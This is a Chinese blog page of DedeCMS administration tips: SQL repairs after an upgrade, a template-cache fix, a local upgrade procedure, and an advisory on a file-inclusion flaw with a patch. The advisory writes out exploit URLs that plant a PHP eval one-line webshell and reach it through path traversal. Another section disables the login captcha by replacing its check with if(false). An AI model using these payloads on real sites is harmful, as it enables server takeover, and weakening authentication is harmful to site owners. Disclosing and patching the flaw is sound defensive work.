阿彻和阿彻的博客

dedecms升级之后，有可能会出现这种情况，在修改栏目的时候出现
保存当前栏目更改时失败,请检查你的输入资料是否存在问题
这是什么原因呢？
我在网上找到解决方案，使用SQL命令就可以。
手工在“系统->SQL命令行工具” ，选择“多行命令”，然后将以下9条SQL代码全部复制进去，并运行。
ALTER TABLE `#@__admintype` CHANGE `rank` `rank` FLOAT( 6 ) DEFAULT ‘1′;
UPDATE `#@__admintype` set `rank`=(5 + (`rank`/10)) where `rank` > 10;
ALTER TABLE `#@__admin` CHANGE `usertype` `usertype` FLOAT( 6 ) UNSIGNED DEFAULT ‘0′;
UPDATE `#@__admin` set `usertype`=(5 + (`usertype`/10)) where `usertype` > 10;
INSERT INTO `#@__sysconfig` (`aid`, `varname`, `info`, `groupid`, `type`, `value`) VALUES (746, ‘cfg_album_mark’, ‘图集是否使用水印(小图也会受影响)’, 3, ‘bool’, [...]

此漏洞非常严重，可直接获得webshell。
inculde/datalistcp.class.php 第十行预览源代码打印关于1 require_once(DEDEINC.”/code/datalist.”.$codefile.”.inc”);
同时，inculde/dedesql.class.php 中预览源代码打印关于1 $errorTrackFile = dirname(__FILE__).”/../data/mysql_error_trace.inc”;
$codefile没有做过滤。
我们可以用datalistcp.class.php 包含mysql_error_trace.inc 执行PHP脚本程序。
利用方法：
www.sitedir.com.cn/plus/digg_frame … d&id=1024e1024&mid=*/eval%28$_POST[xxxxx]%29;/*
写入一句话后门
后门地址：
www.sitedir.com.cn/plus/comments_frame.php?needCode=gb2312.inc..\..\../../data/mysql_error_trace用一句话客户端连接
密码是：xxxxx
修补方案：
将inculde/datalistcp.class.php 第十行预览源代码打印关于1 require_once(DEDEINC.”/code/datalist.”.$codefile.”.inc”);
替换成：预览源代码打印关于1 //require_once(DEDEINC.”/code/datalist.”.$codefile.”.inc”);
2 $lang_pre_page = ”上页”;
3 $lang_next_page = ”下页”;
4 $lang_index_page = ”首页”;
5 $lang_end_page = ”末页”;
6 $lang_record_number = ”条记录”;
7 $lang_page = ”页”;
8 $lang_total = ”共”;
或者将$codefile直接替换成gb2313 utf-8等
总结：
之前一直以为inculde/dedesql.class.php 可以创建一个mysql_error_trace.php 并写入后门，后来测试下，发现不行。
然后找了inculde/datalistcp.class.php这么一个玩意。plus/comments_frame.php 是用来注册DEDEINC这个变量，否则不好使。
我这里给大家个建议 把PLUS里面的文件用不到的统统删除 尤其DIGG_ 2个文件

使用dedecms后台更新文档的时候，出现这个问题”模板文件不存在，无法解析文档”。
其实出现这个问题，并不是模板真的不存在，当然也有可能不存在。
处理方式：排除法。
1、我们先去看是不是真的文档不存在，有可能是误删或者其他的
2、如果排除这个问题，接下来就很简单了，直接在栏目找到更新缓存，然后再试，基本上都是可以顺利解决。
还有一点，一般新安装的网站后台，如果更换模板的时候，最好也进行缓存的更新，否则出现模板不好用的问题。

解决一：session 保存不成功，原因是目录没有写权限；怎么修改？点击这里
解决二：可以取消掉验证码，具体方法如下
实现的方法一共分为两步来进行：
打开 login.php 找到：
if($validate==” || $validate != $svali)
替换为：
if( false )
然后，在模板dede/templets/login.htm里去掉以下验证码的具体HTML代码：
<li><span>验证码：</span>
<input name=”validate” type=”text” id=”vdcode” style=’width:50px;text-transform:uppercase;’ />
<img id=”vdimgck” src=”../include/vdimgck.php” alt=”看不清？点击更换” align=”absmiddle” style=”cursor:pointer” onclick=”this.src=this.src+’?’” />
</li>

以前在本地试过很多次都是现实数据库无法连接，搞得很郁闷，所以一直没有真正去做，最近发现数据库链接文件被人修改，寻思是不是老版本不安全，于是最近又尝试了一下，居然成功，特意分享一下。
本地测试环境：APMServ5.2.6（这个东东很好用，因为是win环境所以先配置了一下这个）这是官网http://apmserv.s135.com/
第一步：配置APMServ5.2.6里面的mysql5.1，删除root账户，新建全权账户、数据库（我选择跟原来数据库名称、用户名、密码一致的）
第二部：先下载升级包  http://updatenew.dedecms.com/DedeCmsUPV5.3Pack/v3-v4-upToV5.3GBK.zip
第三步：下载网站文件，复制到d:\APMServ5.2.6\www\htdocs下面，删除跟升级包冲突的文件
第四步：把升级包文件粘贴到d:\APMServ5.2.6\www\htdocs下面，运行http://网址/install/index.php，进行升级，按新建的数据库、用户名、密码填写，编码选择跟之前一样。
第五步：跟虚拟空间技术要数据库原文件，记住一定是源文件，也就是散的数据库文件，非导入或者备份的文件。
第六步：停止APMServ5.2.6，打开D:\APMServ5.2.6\MySQL5.1\data\mysql（数据库名称），把文件清空，然后复制从技术要来的源文件粘贴进去
大功告成，顺利登陆后台，不会出现找不到用户名或者密码错误或者数据库后台文件乱码的情况。